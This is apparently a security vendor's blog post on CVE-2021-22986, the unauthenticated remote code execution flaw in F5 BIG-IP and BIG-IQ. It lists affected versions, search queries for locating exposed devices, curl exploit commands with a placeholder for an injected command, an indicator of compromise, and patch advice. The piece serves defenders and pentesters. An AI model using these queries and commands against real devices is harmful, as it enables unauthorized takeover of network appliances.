How to detect CVE-2021-22986 RCE with Pentest-Tools.com
As a pentester, when you see a major critical vulnerability persist for months in unpatched systems (like Log4Shell), you have a responsibility to help others understand its severity and how they can fix it. This is exactly why this article exists.
We saw a lot of vulnerable and unpatched systems out in the wild, even if the security flaw was discovered around March 2021, so we couldn’t just stand on the sidelines.
Discovered around March 2021, CVE-2021-22986 still keeps the door open for attackers in many vulnerable systems in the wild. So this guide is dedicated to how you can search for vulnerable hosts, how you can exploit the vulnerability, and the solution to mitigate it.
What is F5 iControl?
The F5 iControl is a REST-based API that allows you to execute multiple actions for BIG-IP devices that you manage, such as changing the system configuration.
What is CVE-2021-22986?
Let’s talk about the context of the vulnerability. It was discovered in early spring 2021 and, in spite of months have passed since a lot of devices are still vulnerable and many threat actors are actively exploiting this vuln in the wild.
But what makes it so attractive to malicious hackers?
The vulnerability has a CVSS score of 9.8 and was categorized as “Critical” because you can achieve full device compromise through Remote Command Execution. Even worse, you can do all of this unauthenticated. What’s more, the BIG-IP devices in Appliance mode are also vulnerable.
To make matters worse, it was also observed that a Mirai variant has been actively exploiting this vulnerability.
We are now observing the Mirai variant from https://t.co/ZDTVwtdYlq attempting to exploit CVE-2021-22986, an unauthenticated RCE in F5 BIG-IP & BIG-IQ products, and CVE-2020-28188.
IOCs for the new activity available at: https://t.co/bc0IySEAEk pic.twitter.com/ZsUqxq60XO
— Unit 42 (@Unit42_Intel) March 19, 2021
Vulnerable products and versions
Here’s the list of affected products and their versions for the CVE-2021-22986 RCE flaw so you can check your tech stack for this vuln:
F5 BIG-IP Devices (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO):
12.1.0-12.1.5.2
13.1.0-13.1.3.5
14.1.0-14.1.3.1
15.1.0-15.1.2
16.0.0-16.0.1
F5 BIG-IQ Centralized Management:
6.0.0-6.1.0
7.0.0-7.0.0.1
7.1.0-7.1.0.2
Now that you have the essential details you need, let’s take a look at how to detect and exploit it using Pentest-Tools.com.
How to find systems potentially impacted by CVE-2021-22986
I’m about to showcase three main ways to find hosts and devices that may be affected by the CVE-2021-22986 vulnerability.
Using Shodan
At the time of writing this article, there were at least 6,000 devices found through Shodan.
You can use the following query to discover F5 BIG-IP potentially devices vulnerable to this unauthenticated RCE vuln:
http.title:”BIG-IP®-Redirect”
Using Google Dorks
F5 BIG-IP devices use web-based interfaces, so you can use Google Dorks to sniff out F5 hosts with the following search queries:
inurl:my.logout.php3?
inurl:”/my.policy” big-ip
intitle:”BIG-IP logout page”
intext:”Thank you for using BIG-IP.”
intext:”This product is licensed from F5 Networks.”
intext:”F5 Networks. All rights reserved”
Using PublicWWW
PublicWWW is a search engine you can use to hunt for websites based on source code content, response headers, cookies, and technology used. You can use the same dorks I just mentioned and also a few more details such as:
“my.logout.php3”
“/my.policy”
“BIG-IP logout page”
“Thank you for using BIG-IP.”
“This product is licensed from F5 Networks.”
“F5 Networks. All rights reserved”
“Set-Cookie: F5_ST”
.png&w=1536&q=50)
How to exploit CVE-2021-22986 in ethical hacking engagements
In order to exploit the CVE-20212-22986, you must follow the below steps:
curl -ksu admin: https://<HOST>/mgmt/tm/access/bundle-install-tasks -d ‘{“filePath”:”<COMMAND>”}’curl -ksu admin: https://<HOST>/mgmt/tm/access/bundle-install-tasks -d ‘{“filePath”:”<COMMAND>”}’curl -su admin: -H “Content-Type: application/json” http://<HOST>:8100/mgmt/tm/util/bash -d ‘{“command”:”run”,”utilCmdArgs”:”-c <COMMAND>”}’
If you’re curious to try another, much faster exploitation tactic, keep reading and watch the demo below.
Known Indicators of Compromise (IoCs) for CVE-2021-22986
According to F5, you should look (manually) for the following entry in the /var/log/restjavad*.log file:
“X-F5-Auth-Token doesn’t have value”
How to detect and exploit CVE-2021-22986 using Pentest-Tools.com
The fastest and no-hassle way to validate that CVE-2021-22986 is exploitable on your target is to use Sniper Automatic Exploiter, the auto-attacker on Pentest-Tools.com.
The tool simulates real-world exploitation and attack techniques automatically:
It scans for open ports, collecting data about the protocol, type of service and version
It fingerprints web services to determine the type of web application running and the tech stack behind it
It looks for compatible exploits
It checks if the target is indeed vulnerable – without extracting any data at this stage
Once it gains RCE, Sniper automatically extracts all the artefacts (current and local users, system information, running processes, network configuration, etc.), which you’ll get in the output report
It does clean-up, so the target is left unaltered.
As you can see from the demo, this all happens in literally a minute which is a massive gain compared to manual exploitation, especially when you’re pressed for time in a pentest (and when doesn’t that happen?).
If you need a report with findings for the F5 iControl REST Unauthenticated RCE, you can use the Pentest-Tools.com Network Vulnerability Scanner. Run it on your target and get a full, ready-to-use report with rich details that you can share with colleagues and clients:
How to mitigate CVE-2021-22986
First, it is recommended to install a patched version for your devices:
BIG-IP 16.0.1.1+
BIG-IP 15.1.2.1+
BIG-IP 14.1.4+
BIG-IP 13.1.3.6+
BIG-IP 12.1.5.3+
BIG-IQ 7.1.0.3+
BIG-IQ 7.0.0.2+
If for some reason, you can’t apply this patch, then you should restrict access to the iControl REST interface for any IP address except for your administrator’s one.
Working together to cope with the landslide
With a constant flow of vulnerabilities that keep security specialists in firefighting mode, it’s really difficult to keep up. That’s why we, at Pentest-Tools.com, believe in helping each other by sharing expertise, methods, and insights while supporting collaboration in a way that truly makes a difference. It’s not easy work but it is our work and we’re committed to doing the best job we can.
If there’s a specific guide you need that you’re missing to help you get ahead in your role and make a bigger impact at work – and in the industry – let us know!
